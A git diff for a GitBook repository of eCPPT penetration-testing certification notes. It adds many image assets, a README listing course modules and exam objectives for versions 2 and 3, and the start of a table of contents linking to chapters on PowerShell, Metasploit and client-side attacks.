diff --git a/.gitbook/assets/Diagramma senza titolo.drawio (1).png b/.gitbook/assets/Diagramma senza titolo.drawio (1).png
new file mode 100644
index 0000000..6225b49
Binary files /dev/null and b/.gitbook/assets/Diagramma senza titolo.drawio (1).png differ
diff --git a/.gitbook/assets/Diagramma senza titolo.drawio (4).png b/.gitbook/assets/Diagramma senza titolo.drawio (4).png
new file mode 100644
index 0000000..640e4f7
Binary files /dev/null and b/.gitbook/assets/Diagramma senza titolo.drawio (4).png differ
diff --git a/.gitbook/assets/Diagramma senza titolo.drawio (5) (1).png b/.gitbook/assets/Diagramma senza titolo.drawio (5) (1).png
new file mode 100644
index 0000000..d382317
Binary files /dev/null and b/.gitbook/assets/Diagramma senza titolo.drawio (5) (1).png differ
diff --git a/.gitbook/assets/Diagramma senza titolo.drawio (5) (2).png b/.gitbook/assets/Diagramma senza titolo.drawio (5) (2).png
new file mode 100644
index 0000000..d382317
Binary files /dev/null and b/.gitbook/assets/Diagramma senza titolo.drawio (5) (2).png differ
diff --git a/.gitbook/assets/Diagramma senza titolo.drawio (5).png b/.gitbook/assets/Diagramma senza titolo.drawio (5).png
new file mode 100644
index 0000000..d382317
Binary files /dev/null and b/.gitbook/assets/Diagramma senza titolo.drawio (5).png differ
diff --git a/.gitbook/assets/Diagramma senza titolo.drawio (6) (1).png b/.gitbook/assets/Diagramma senza titolo.drawio (6) (1).png
new file mode 100644
index 0000000..1225d5c
Binary files /dev/null and b/.gitbook/assets/Diagramma senza titolo.drawio (6) (1).png differ
diff --git a/.gitbook/assets/Diagramma senza titolo.drawio (6).png b/.gitbook/assets/Diagramma senza titolo.drawio (6).png
new file mode 100644
index 0000000..1225d5c
Binary files /dev/null and b/.gitbook/assets/Diagramma senza titolo.drawio (6).png differ
diff --git a/.gitbook/assets/Schermata del 2023-08-03 17-41-40.png b/.gitbook/assets/Schermata del 2023-08-03 17-41-40.png
new file mode 100644
index 0000000..ecb3f1d
Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-03 17-41-40.png differ
diff --git a/.gitbook/assets/Schermata del 2023-08-03 17-53-19.png b/.gitbook/assets/Schermata del 2023-08-03 17-53-19.png
new file mode 100644
index 0000000..9a268c5
Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-03 17-53-19.png differ
diff --git a/.gitbook/assets/Schermata del 2023-08-03 18-15-13.png b/.gitbook/assets/Schermata del 2023-08-03 18-15-13.png
new file mode 100644
index 0000000..43ccf81
Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-03 18-15-13.png differ
diff --git a/.gitbook/assets/Schermata del 2023-08-05 12-20-09.png b/.gitbook/assets/Schermata del 2023-08-05 12-20-09.png
new file mode 100644
index 0000000..5c62bb2
Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-05 12-20-09.png differ
diff --git a/.gitbook/assets/Schermata del 2023-08-05 12-40-59.png b/.gitbook/assets/Schermata del 2023-08-05 12-40-59.png
new file mode 100644
index 0000000..4091a8f
Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-05 12-40-59.png differ
diff --git a/.gitbook/assets/Schermata del 2023-08-05 12-43-01.png b/.gitbook/assets/Schermata del 2023-08-05 12-43-01.png
new file mode 100644
index 0000000..251d3bc
Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-05 12-43-01.png differ
diff --git a/.gitbook/assets/Schermata del 2023-08-05 12-50-46.png b/.gitbook/assets/Schermata del 2023-08-05 12-50-46.png
new file mode 100644
index 0000000..6ee4efe
Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-05 12-50-46.png differ
diff --git a/.gitbook/assets/Schermata del 2023-08-05 18-41-30.png b/.gitbook/assets/Schermata del 2023-08-05 18-41-30.png
new file mode 100644
index 0000000..e86fec7
Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-05 18-41-30.png differ
diff --git a/.gitbook/assets/Schermata del 2023-08-05 18-44-30.png b/.gitbook/assets/Schermata del 2023-08-05 18-44-30.png
new file mode 100644
index 0000000..94808ad
Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-05 18-44-30.png differ
diff --git a/.gitbook/assets/Schermata del 2023-08-05 18-50-08.png b/.gitbook/assets/Schermata del 2023-08-05 18-50-08.png
new file mode 100644
index 0000000..5b5d3b7
Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-05 18-50-08.png differ
diff --git a/.gitbook/assets/Schermata del 2023-08-05 19-21-12.png b/.gitbook/assets/Schermata del 2023-08-05 19-21-12.png
new file mode 100644
index 0000000..71a66e1
Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-05 19-21-12.png differ
diff --git a/.gitbook/assets/Schermata del 2023-08-05 19-27-56.png b/.gitbook/assets/Schermata del 2023-08-05 19-27-56.png
new file mode 100644
index 0000000..a558f7d
Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-05 19-27-56.png differ
diff --git a/.gitbook/assets/Schermata del 2023-08-06 12-17-42.png b/.gitbook/assets/Schermata del 2023-08-06 12-17-42.png
new file mode 100644
index 0000000..8d41c9a
Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-06 12-17-42.png differ
diff --git a/.gitbook/assets/Schermata del 2023-08-06 12-19-41.png b/.gitbook/assets/Schermata del 2023-08-06 12-19-41.png
new file mode 100644
index 0000000..5aa3afc
Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-06 12-19-41.png differ
diff --git a/.gitbook/assets/Schermata del 2023-08-06 12-29-05.png b/.gitbook/assets/Schermata del 2023-08-06 12-29-05.png
new file mode 100644
index 0000000..3b90293
Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-06 12-29-05.png differ
diff --git a/.gitbook/assets/Schermata del 2023-08-06 12-31-55 (1).png b/.gitbook/assets/Schermata del 2023-08-06 12-31-55 (1).png
new file mode 100644
index 0000000..30e1fd6
Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-06 12-31-55 (1).png differ
diff --git a/.gitbook/assets/Schermata del 2023-08-06 12-31-55 (2).png b/.gitbook/assets/Schermata del 2023-08-06 12-31-55 (2).png
new file mode 100644
index 0000000..30e1fd6
Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-06 12-31-55 (2).png differ
diff --git a/.gitbook/assets/Schermata del 2023-08-06 12-31-55.png b/.gitbook/assets/Schermata del 2023-08-06 12-31-55.png
new file mode 100644
index 0000000..30e1fd6
Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-06 12-31-55.png differ
diff --git a/.gitbook/assets/Schermata del 2023-08-06 17-04-30.png b/.gitbook/assets/Schermata del 2023-08-06 17-04-30.png
new file mode 100644
index 0000000..f29ff2b
Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-06 17-04-30.png differ
diff --git a/.gitbook/assets/Schermata del 2023-08-06 17-05-19.png b/.gitbook/assets/Schermata del 2023-08-06 17-05-19.png
new file mode 100644
index 0000000..165ed66
Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-06 17-05-19.png differ
diff --git a/.gitbook/assets/Schermata del 2023-08-06 17-20-52.png b/.gitbook/assets/Schermata del 2023-08-06 17-20-52.png
new file mode 100644
index 0000000..8b7bbdf
Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-06 17-20-52.png differ
diff --git a/.gitbook/assets/Schermata del 2023-08-08 19-57-29.png b/.gitbook/assets/Schermata del 2023-08-08 19-57-29.png
new file mode 100644
index 0000000..eec1b8c
Binary files /dev/null and b/.gitbook/assets/Schermata del 2023-08-08 19-57-29.png differ
diff --git a/.gitbook/assets/image (1).png b/.gitbook/assets/image (1).png
new file mode 100644
index 0000000..92a7edb
Binary files /dev/null and b/.gitbook/assets/image (1).png differ
diff --git a/.gitbook/assets/image (10).png b/.gitbook/assets/image (10).png
new file mode 100644
index 0000000..54fb0de
Binary files /dev/null and b/.gitbook/assets/image (10).png differ
diff --git a/.gitbook/assets/image (11).png b/.gitbook/assets/image (11).png
new file mode 100644
index 0000000..b2e50f6
Binary files /dev/null and b/.gitbook/assets/image (11).png differ
diff --git a/.gitbook/assets/image (12).png b/.gitbook/assets/image (12).png
new file mode 100644
index 0000000..f747f0e
Binary files /dev/null and b/.gitbook/assets/image (12).png differ
diff --git a/.gitbook/assets/image (13).png b/.gitbook/assets/image (13).png
new file mode 100644
index 0000000..e3365d7
Binary files /dev/null and b/.gitbook/assets/image (13).png differ
diff --git a/.gitbook/assets/image (14).png b/.gitbook/assets/image (14).png
new file mode 100644
index 0000000..6d6e50e
Binary files /dev/null and b/.gitbook/assets/image (14).png differ
diff --git a/.gitbook/assets/image (15).png b/.gitbook/assets/image (15).png
new file mode 100644
index 0000000..910e6c2
Binary files /dev/null and b/.gitbook/assets/image (15).png differ
diff --git a/.gitbook/assets/image (16).png b/.gitbook/assets/image (16).png
new file mode 100644
index 0000000..486fbda
Binary files /dev/null and b/.gitbook/assets/image (16).png differ
diff --git a/.gitbook/assets/image (17).png b/.gitbook/assets/image (17).png
new file mode 100644
index 0000000..dbc6ba8
Binary files /dev/null and b/.gitbook/assets/image (17).png differ
diff --git a/.gitbook/assets/image (18).png b/.gitbook/assets/image (18).png
new file mode 100644
index 0000000..fe66127
Binary files /dev/null and b/.gitbook/assets/image (18).png differ
diff --git a/.gitbook/assets/image (19).png b/.gitbook/assets/image (19).png
new file mode 100644
index 0000000..c78b470
Binary files /dev/null and b/.gitbook/assets/image (19).png differ
diff --git a/.gitbook/assets/image (2).png b/.gitbook/assets/image (2).png
new file mode 100644
index 0000000..92a7edb
Binary files /dev/null and b/.gitbook/assets/image (2).png differ
diff --git a/.gitbook/assets/image (20).png b/.gitbook/assets/image (20).png
new file mode 100644
index 0000000..e7c3e7f
Binary files /dev/null and b/.gitbook/assets/image (20).png differ
diff --git a/.gitbook/assets/image (21).png b/.gitbook/assets/image (21).png
new file mode 100644
index 0000000..ab58c85
Binary files /dev/null and b/.gitbook/assets/image (21).png differ
diff --git a/.gitbook/assets/image (22).png b/.gitbook/assets/image (22).png
new file mode 100644
index 0000000..4c3ffc3
Binary files /dev/null and b/.gitbook/assets/image (22).png differ
diff --git a/.gitbook/assets/image (23).png b/.gitbook/assets/image (23).png
new file mode 100644
index 0000000..4e389a8
Binary files /dev/null and b/.gitbook/assets/image (23).png differ
diff --git a/.gitbook/assets/image (24).png b/.gitbook/assets/image (24).png
new file mode 100644
index 0000000..ad76a01
Binary files /dev/null and b/.gitbook/assets/image (24).png differ
diff --git a/.gitbook/assets/image (25).png b/.gitbook/assets/image (25).png
new file mode 100644
index 0000000..129ff14
Binary files /dev/null and b/.gitbook/assets/image (25).png differ
diff --git a/.gitbook/assets/image (26).png b/.gitbook/assets/image (26).png
new file mode 100644
index 0000000..9c0d441
Binary files /dev/null and b/.gitbook/assets/image (26).png differ
diff --git a/.gitbook/assets/image (27).png b/.gitbook/assets/image (27).png
new file mode 100644
index 0000000..8d20b43
Binary files /dev/null and b/.gitbook/assets/image (27).png differ
diff --git a/.gitbook/assets/image (28).png b/.gitbook/assets/image (28).png
new file mode 100644
index 0000000..01c8233
Binary files /dev/null and b/.gitbook/assets/image (28).png differ
diff --git a/.gitbook/assets/image (29).png b/.gitbook/assets/image (29).png
new file mode 100644
index 0000000..3b180eb
Binary files /dev/null and b/.gitbook/assets/image (29).png differ
diff --git a/.gitbook/assets/image (3).png b/.gitbook/assets/image (3).png
new file mode 100644
index 0000000..be7c436
Binary files /dev/null and b/.gitbook/assets/image (3).png differ
diff --git a/.gitbook/assets/image (30).png b/.gitbook/assets/image (30).png
new file mode 100644
index 0000000..cffd1b4
Binary files /dev/null and b/.gitbook/assets/image (30).png differ
diff --git a/.gitbook/assets/image (31).png b/.gitbook/assets/image (31).png
new file mode 100644
index 0000000..9c0d441
Binary files /dev/null and b/.gitbook/assets/image (31).png differ
diff --git a/.gitbook/assets/image (32).png b/.gitbook/assets/image (32).png
new file mode 100644
index 0000000..8d20b43
Binary files /dev/null and b/.gitbook/assets/image (32).png differ
diff --git a/.gitbook/assets/image (33).png b/.gitbook/assets/image (33).png
new file mode 100644
index 0000000..a8cea0a
Binary files /dev/null and b/.gitbook/assets/image (33).png differ
diff --git a/.gitbook/assets/image (34).png b/.gitbook/assets/image (34).png
new file mode 100644
index 0000000..558435c
Binary files /dev/null and b/.gitbook/assets/image (34).png differ
diff --git a/.gitbook/assets/image (35).png b/.gitbook/assets/image (35).png
new file mode 100644
index 0000000..dbbf0b0
Binary files /dev/null and b/.gitbook/assets/image (35).png differ
diff --git a/.gitbook/assets/image (36).png b/.gitbook/assets/image (36).png
new file mode 100644
index 0000000..1e15cbb
Binary files /dev/null and b/.gitbook/assets/image (36).png differ
diff --git a/.gitbook/assets/image (37).png b/.gitbook/assets/image (37).png
new file mode 100644
index 0000000..a1d94f3
Binary files /dev/null and b/.gitbook/assets/image (37).png differ
diff --git a/.gitbook/assets/image (38).png b/.gitbook/assets/image (38).png
new file mode 100644
index 0000000..4e1f43a
Binary files /dev/null and b/.gitbook/assets/image (38).png differ
diff --git a/.gitbook/assets/image (39).png b/.gitbook/assets/image (39).png
new file mode 100644
index 0000000..716ba42
Binary files /dev/null and b/.gitbook/assets/image (39).png differ
diff --git a/.gitbook/assets/image (4).png b/.gitbook/assets/image (4).png
new file mode 100644
index 0000000..e2d4385
Binary files /dev/null and b/.gitbook/assets/image (4).png differ
diff --git a/.gitbook/assets/image (40).png b/.gitbook/assets/image (40).png
new file mode 100644
index 0000000..985f3a9
Binary files /dev/null and b/.gitbook/assets/image (40).png differ
diff --git a/.gitbook/assets/image (41).png b/.gitbook/assets/image (41).png
new file mode 100644
index 0000000..5e420f9
Binary files /dev/null and b/.gitbook/assets/image (41).png differ
diff --git a/.gitbook/assets/image (42).png b/.gitbook/assets/image (42).png
new file mode 100644
index 0000000..e0e6439
Binary files /dev/null and b/.gitbook/assets/image (42).png differ
diff --git a/.gitbook/assets/image (43).png b/.gitbook/assets/image (43).png
new file mode 100644
index 0000000..a4a29aa
Binary files /dev/null and b/.gitbook/assets/image (43).png differ
diff --git a/.gitbook/assets/image (44).png b/.gitbook/assets/image (44).png
new file mode 100644
index 0000000..9060227
Binary files /dev/null and b/.gitbook/assets/image (44).png differ
diff --git a/.gitbook/assets/image (45).png b/.gitbook/assets/image (45).png
new file mode 100644
index 0000000..628de37
Binary files /dev/null and b/.gitbook/assets/image (45).png differ
diff --git a/.gitbook/assets/image (46).png b/.gitbook/assets/image (46).png
new file mode 100644
index 0000000..f365f7a
Binary files /dev/null and b/.gitbook/assets/image (46).png differ
diff --git a/.gitbook/assets/image (47).png b/.gitbook/assets/image (47).png
new file mode 100644
index 0000000..061f7c9
Binary files /dev/null and b/.gitbook/assets/image (47).png differ
diff --git a/.gitbook/assets/image (48).png b/.gitbook/assets/image (48).png
new file mode 100644
index 0000000..bb0b76d
Binary files /dev/null and b/.gitbook/assets/image (48).png differ
diff --git a/.gitbook/assets/image (49).png b/.gitbook/assets/image (49).png
new file mode 100644
index 0000000..c9e9072
Binary files /dev/null and b/.gitbook/assets/image (49).png differ
diff --git a/.gitbook/assets/image (5).png b/.gitbook/assets/image (5).png
new file mode 100644
index 0000000..873987d
Binary files /dev/null and b/.gitbook/assets/image (5).png differ
diff --git a/.gitbook/assets/image (50).png b/.gitbook/assets/image (50).png
new file mode 100644
index 0000000..aca231d
Binary files /dev/null and b/.gitbook/assets/image (50).png differ
diff --git a/.gitbook/assets/image (51).png b/.gitbook/assets/image (51).png
new file mode 100644
index 0000000..62934e6
Binary files /dev/null and b/.gitbook/assets/image (51).png differ
diff --git a/.gitbook/assets/image (52).png b/.gitbook/assets/image (52).png
new file mode 100644
index 0000000..f6de218
Binary files /dev/null and b/.gitbook/assets/image (52).png differ
diff --git a/.gitbook/assets/image (53).png b/.gitbook/assets/image (53).png
new file mode 100644
index 0000000..d3de2f1
Binary files /dev/null and b/.gitbook/assets/image (53).png differ
diff --git a/.gitbook/assets/image (54).png b/.gitbook/assets/image (54).png
new file mode 100644
index 0000000..d3de2f1
Binary files /dev/null and b/.gitbook/assets/image (54).png differ
diff --git a/.gitbook/assets/image (55).png b/.gitbook/assets/image (55).png
new file mode 100644
index 0000000..fb99296
Binary files /dev/null and b/.gitbook/assets/image (55).png differ
diff --git a/.gitbook/assets/image (56).png b/.gitbook/assets/image (56).png
new file mode 100644
index 0000000..d7f0f47
Binary files /dev/null and b/.gitbook/assets/image (56).png differ
diff --git a/.gitbook/assets/image (57).png b/.gitbook/assets/image (57).png
new file mode 100644
index 0000000..0f521bd
Binary files /dev/null and b/.gitbook/assets/image (57).png differ
diff --git a/.gitbook/assets/image (58).png b/.gitbook/assets/image (58).png
new file mode 100644
index 0000000..607c85f
Binary files /dev/null and b/.gitbook/assets/image (58).png differ
diff --git a/.gitbook/assets/image (59).png b/.gitbook/assets/image (59).png
new file mode 100644
index 0000000..787df9e
Binary files /dev/null and b/.gitbook/assets/image (59).png differ
diff --git a/.gitbook/assets/image (6).png b/.gitbook/assets/image (6).png
new file mode 100644
index 0000000..33fc12a
Binary files /dev/null and b/.gitbook/assets/image (6).png differ
diff --git a/.gitbook/assets/image (60).png b/.gitbook/assets/image (60).png
new file mode 100644
index 0000000..e5df3cd
Binary files /dev/null and b/.gitbook/assets/image (60).png differ
diff --git a/.gitbook/assets/image (61).png b/.gitbook/assets/image (61).png
new file mode 100644
index 0000000..2049459
Binary files /dev/null and b/.gitbook/assets/image (61).png differ
diff --git a/.gitbook/assets/image (62).png b/.gitbook/assets/image (62).png
new file mode 100644
index 0000000..2049459
Binary files /dev/null and b/.gitbook/assets/image (62).png differ
diff --git a/.gitbook/assets/image (63).png b/.gitbook/assets/image (63).png
new file mode 100644
index 0000000..ef3fa51
Binary files /dev/null and b/.gitbook/assets/image (63).png differ
diff --git a/.gitbook/assets/image (64).png b/.gitbook/assets/image (64).png
new file mode 100644
index 0000000..ddc5334
Binary files /dev/null and b/.gitbook/assets/image (64).png differ
diff --git a/.gitbook/assets/image (65).png b/.gitbook/assets/image (65).png
new file mode 100644
index 0000000..1b66d35
Binary files /dev/null and b/.gitbook/assets/image (65).png differ
diff --git a/.gitbook/assets/image (66).png b/.gitbook/assets/image (66).png
new file mode 100644
index 0000000..7db4bf4
Binary files /dev/null and b/.gitbook/assets/image (66).png differ
diff --git a/.gitbook/assets/image (67).png b/.gitbook/assets/image (67).png
new file mode 100644
index 0000000..7db4bf4
Binary files /dev/null and b/.gitbook/assets/image (67).png differ
diff --git a/.gitbook/assets/image (68).png b/.gitbook/assets/image (68).png
new file mode 100644
index 0000000..9323033
Binary files /dev/null and b/.gitbook/assets/image (68).png differ
diff --git a/.gitbook/assets/image (69).png b/.gitbook/assets/image (69).png
new file mode 100644
index 0000000..ef2b7e4
Binary files /dev/null and b/.gitbook/assets/image (69).png differ
diff --git a/.gitbook/assets/image (7).png b/.gitbook/assets/image (7).png
new file mode 100644
index 0000000..66eea6d
Binary files /dev/null and b/.gitbook/assets/image (7).png differ
diff --git a/.gitbook/assets/image (70).png b/.gitbook/assets/image (70).png
new file mode 100644
index 0000000..e1d632b
Binary files /dev/null and b/.gitbook/assets/image (70).png differ
diff --git a/.gitbook/assets/image (71).png b/.gitbook/assets/image (71).png
new file mode 100644
index 0000000..8969970
Binary files /dev/null and b/.gitbook/assets/image (71).png differ
diff --git a/.gitbook/assets/image (72).png b/.gitbook/assets/image (72).png
new file mode 100644
index 0000000..62ea8dc
Binary files /dev/null and b/.gitbook/assets/image (72).png differ
diff --git a/.gitbook/assets/image (73).png b/.gitbook/assets/image (73).png
new file mode 100644
index 0000000..0799661
Binary files /dev/null and b/.gitbook/assets/image (73).png differ
diff --git a/.gitbook/assets/image (74).png b/.gitbook/assets/image (74).png
new file mode 100644
index 0000000..460d84e
Binary files /dev/null and b/.gitbook/assets/image (74).png differ
diff --git a/.gitbook/assets/image (75).png b/.gitbook/assets/image (75).png
new file mode 100644
index 0000000..3acadb3
Binary files /dev/null and b/.gitbook/assets/image (75).png differ
diff --git a/.gitbook/assets/image (76).png b/.gitbook/assets/image (76).png
new file mode 100644
index 0000000..5e845a4
Binary files /dev/null and b/.gitbook/assets/image (76).png differ
diff --git a/.gitbook/assets/image (77).png b/.gitbook/assets/image (77).png
new file mode 100644
index 0000000..0dcf522
Binary files /dev/null and b/.gitbook/assets/image (77).png differ
diff --git a/.gitbook/assets/image (78).png b/.gitbook/assets/image (78).png
new file mode 100644
index 0000000..8d219d8
Binary files /dev/null and b/.gitbook/assets/image (78).png differ
diff --git a/.gitbook/assets/image (79).png b/.gitbook/assets/image (79).png
new file mode 100644
index 0000000..81998f3
Binary files /dev/null and b/.gitbook/assets/image (79).png differ
diff --git a/.gitbook/assets/image (8).png b/.gitbook/assets/image (8).png
new file mode 100644
index 0000000..66eea6d
Binary files /dev/null and b/.gitbook/assets/image (8).png differ
diff --git a/.gitbook/assets/image (80).png b/.gitbook/assets/image (80).png
new file mode 100644
index 0000000..3ee8d96
Binary files /dev/null and b/.gitbook/assets/image (80).png differ
diff --git a/.gitbook/assets/image (81).png b/.gitbook/assets/image (81).png
new file mode 100644
index 0000000..9a6df2e
Binary files /dev/null and b/.gitbook/assets/image (81).png differ
diff --git a/.gitbook/assets/image (9).png b/.gitbook/assets/image (9).png
new file mode 100644
index 0000000..0a0c3c2
Binary files /dev/null and b/.gitbook/assets/image (9).png differ
diff --git a/.gitbook/assets/image.png b/.gitbook/assets/image.png
new file mode 100644
index 0000000..53b76b8
Binary files /dev/null and b/.gitbook/assets/image.png differ
diff --git a/.gitbook/assets/smb (1).gif b/.gitbook/assets/smb (1).gif
new file mode 100644
index 0000000..a894aad
Binary files /dev/null and b/.gitbook/assets/smb (1).gif differ
diff --git a/.gitbook/assets/smb.gif b/.gitbook/assets/smb.gif
new file mode 100644
index 0000000..a8b9c92
Binary files /dev/null and b/.gitbook/assets/smb.gif differ
diff --git a/README.md b/README.md
index 5154eac..cf8bf15 100644
--- a/README.md
+++ b/README.md
@@ -1,2 +1,138 @@
-# eCPPTv3-Notes
-INE/eLearnSecurity Certified Professional Penetration Tester (eCPPT) / PTP v2 and v3 Notes
+---
+description: >-
+ INE/eLearnSecurity Certified Professional Penetration Tester (eCPPT) / PTP v2
+ and v3 Notes
+---
+
+# ๐Ÿ“ eCPPT / PTP - Notes
+
+ +## ๐Ÿ“• eCPPT - Version 3 (newest - after 2024) + +### Course duration & Topics โณ๐Ÿ“š + +\~ 107 hours (_`~97 of videos`_) **10** courses , **172** videos, **124** quizzes, **67** labs + +* [**Resource Development & Initial Access**](readme/ecpptv3/powershell-for-pt/) \~ 22 hours +* [**Web Application Attacks** ](readme/ecpptv3/web-app-security/)\~ 14 hours +* [**Network Security**](readme/ecpptv3/network-security/) \~ 17 hours +* [**Exploit Development** ](readme/ecpptv3/system-security/)\~ 7 hours +* [**Post Exploitation**](readme/ecpptv3/linux-exploitation/) \~ 18 hours +* [**Red Teaming**](readme/ecpptv3/wi-fi-security/) \~ 19 hours + +๐Ÿ›ฃ๏ธ [**RoadMap / Exam Preparation** ](roadmap-and-my-experience.md)๐Ÿง‘๐Ÿปโ€๐Ÿซ + +### E-Links ๐Ÿ”—๐Ÿ“” + +* Where to find the eCPPTv3 certification exam? - [eCPPTv3](https://security.ine.com/certifications/ecppt-certification/) +* Where to find the PTPv3 (Professional Penetration Testing v3) course [INE Learning Pathsโ€‹](https://my.ine.com/CyberSecurity/learning-paths/5e26d0ba-d258-49e0-a421-56cc06626f46/penetration-testing-professional-new-2024) + +โ€‹โ€‹[eCPPT](https://security.ine.com/certifications/ecppt-certification/) Exam ๐Ÿ“„๐Ÿ–Š๏ธ + +
+ +* **Time limit**: 24h +* **Expiration date**: yes +* **Objectives**: + + **Information Gathering & Reconnaissance** (10%) + + * Perform Host Discovery and Port Scanning on Target Networks + * Enumerate Information From Services Running on Open Ports + + **Initial Access** (15%) + + * Perform Username Enumeration to Identify Valid User Accounts on Target Systems + * Perform Password Spraying Attacks to Identify Valid Credentials for Initial Access + * Perform Brute-Force Attacks on Remote Access Services for Initial Access + + **Web Application Penetration Testing** (15%) + + * Perform Web Application Enumeration to Identify Potential Vulnerabilities & Misconfigurations + * Identify and Exploit Common Web Application Vulnerabilities For Initial Access (SQLi, XSS, Command Injection, etc) + * Perform Brute-Force Attacks Against Login Forms + * Exploit Vulnerable and Outdated Web Application Components + * Exfiltrate Data and Credentials From Compromised Web Applications and Databases + + **Exploitation & Post-Exploitation** (25%) + + * Identify and Exploit Vulnerabilities or Misconfigurations in Services + * Identify and Exploit Privilege Escalation Vulnerabilities + * Dump and Crack Password Hashes + * Identify Locally Stored Unsecured Credentials + + **Exploit Development** (5%) + + * Develop/Modify Exploit Code For Initial Access and Post-Exploitation + * Identify and Exploit Memory Corruption Vulnerabilities (Stack Overflow, Buffer Overflow) + + **Active Directory Penetration Testing** (30%) + + * Perform Active Directory Enumeration + * Identify Domain Accounts With Weak or Empty Passwords + * Perform AS-REP Roasting to Steal Kerberos Tickets for Authentication + * Perform Active Directory Lateral Movement Techniques (Pass-the-Hash, Pass-the-Ticket) + * Obtain Domain Admin Privileges/Access + +## Resources ๐Ÿ“‘๐Ÿ“˜ + +### ๐Ÿ‘‰ [eCPPT/PTP Cheat Sheet ](ecppt-cheat-sheet.md)๐Ÿ“” + +> ๐Ÿ“– [Read the Lab 
Guidelines](https://drive.google.com/file/d/1kgS7gerK5V5yJxOutb12IPMO1-FLf3Yw/view?usp=drive_link) ๐Ÿ“– + +*** + +

https://security.ine.com/certifications/ecppt-certification/

+ +## ๐Ÿ“™ eCPPT - Version 2 (until 2024) + +### Course duration & Topics โณ๐Ÿ“š + +\~ 84 hours (_`~56h of videos`_) **8** courses , **85** videos, **83** quizzes, **27** labs + +* **โ€‹**[**System Security**](readme/readme/system-security/) \~ 13 hours +* [**Network Security**](readme/readme/network-security/) \~ 33 hours +* [**PowerShell for Pentesters**](readme/readme/powershell-for-pt/) \~ 6 hours +* **โ€‹**[**Linux Exploitation**](readme/readme/linux-exploitation/) \~ 9 hours +* [**โ€‹Web App Security**](readme/readme/web-app-security/) \~ 10 hours +* **โ€‹**[**Wi-Fi Security**](readme/readme/wi-fi-security/) \~ 6 hours +* **โ€‹**[**Metasploit & Ruby**](readme/readme/metasploit-and-ruby/) \~ 8 hours + +๐Ÿ›ฃ๏ธ [**RoadMap / Exam Preparation** ](roadmap-and-my-experience.md)๐Ÿง‘๐Ÿปโ€๐Ÿซ + +### E-Links ๐Ÿ”—๐Ÿ“” + +* Where to find the PTPv2 (Professional Penetration Testing v2) course? - [INE Learning Paths](https://security.ine.com/certifications/ecppt-certification/)โ€‹ +* Where to find the eCPPTv2 certification exam? 
- [eCPPTv2](https://security.ine.com/certifications/ecppt-certification/)โ€‹ + +### โ€‹[eCPPT](https://security.ine.com/certifications/ecppt-certification/) Exam ๐Ÿ“„๐Ÿ–Š๏ธ + +* **Time limit**: 7 days + 7 days for report +* **Expiration date**: no +* **Objectives**: + * Penetration testing processes and methodologies, against Windows and Linux targets + * Vulnerability Assessment of Networks + * Vulnerability Assessment of Web Applications + * Advanced Exploitation with Metasploit + * Performing Attacks in Pivoting + * Web application Manual exploitation + * Information Gathering and Reconnaissance + * Scanning and Profiling the target + * Privilege escalation and Persistence + * Exploit Development + * Advanced Reporting skills and Remediation + +## Resources ๐Ÿ“‘๐Ÿ“˜ + +### ๐Ÿ‘‰ [eCPPT/PTP Cheat Sheet ](ecppt-cheat-sheet.md)๐Ÿ“” + +> ๐Ÿ“– [Read the Lab Guidelines](https://assets.ine.com/certifications/exam-guides/eCPPTv2_PRE_EXAM.pdf) ๐Ÿ“– + +*** + +## Other Resources ๐Ÿ“‘๐Ÿ“˜ + +### [๐Ÿ‘‰ Preparation RoadMap to pass eCPPT/PTP exam ๐Ÿ›ฃ๏ธ](roadmap-and-my-experience.md) + +### ๐Ÿ‘‰ [Exam Experience](https://medium.com/@dev-angelist/learning-path-my-experience-for-the-eccptv2-ptp-certification-april-2024-15ddf6b29a8f) (v2) ๐Ÿ’ฏ diff --git a/SUMMARY.md b/SUMMARY.md new file mode 100644 index 0000000..6f834c9 --- /dev/null +++ b/SUMMARY.md 
@@ -0,0 +1,155 @@
+# Table of contents
+
+* [๐Ÿ“ eCPPT / PTP - Notes](README.md)
+ * [eCPPTv3](readme/ecpptv3/README.md)
+ * [1๏ธโƒฃ 1 - Resource Development & Initial Access](readme/ecpptv3/powershell-for-pt/README.md)
+ * [1.1 - PowerShell for Pentesters](readme/ecpptv3/powershell-for-pt/3.1.md)
+ * [1.2 - Client-Side Attacks](readme/ecpptv3/powershell-for-pt/network-security/README.md)
+ * [1.2.1 - System/Host Based Attacks](readme/ecpptv3/powershell-for-pt/network-security/2.1/README.md)
+ * [1.2.1.1 Windows Vulnerabilities](readme/ecpptv3/powershell-for-pt/network-security/2.1/windows-vulnerabilities.md)
+ * [1.2.2 - The Metasploit Framework (MSF)](readme/ecpptv3/powershell-for-pt/network-security/2.3/README.md)
+ * [1.2.2.1 MSF Introduction](readme/ecpptv3/powershell-for-pt/network-security/2.3/msf-introduction.md)
+ * [1.2.2.2 Information Gathering & Enumeration](readme/ecpptv3/powershell-for-pt/network-security/2.3/information-gathering-and-enumeration.md)
+ * [1.2.2.3 Vulnerability Scanning](readme/ecpptv3/powershell-for-pt/network-security/2.3/vulnerability-scanning.md)
+ * [1.2.2.4 Client-Side Attacks](readme/ecpptv3/powershell-for-pt/network-security/2.3/client-side-attacks.md)
+ * [1.2.2.5 Post Exploitation](readme/ecpptv3/powershell-for-pt/network-security/2.3/post-exploitation.md)
+ * [1.2.2.6 Armitage](readme/ecpptv3/powershell-for-pt/network-security/2.3/armitage.md)
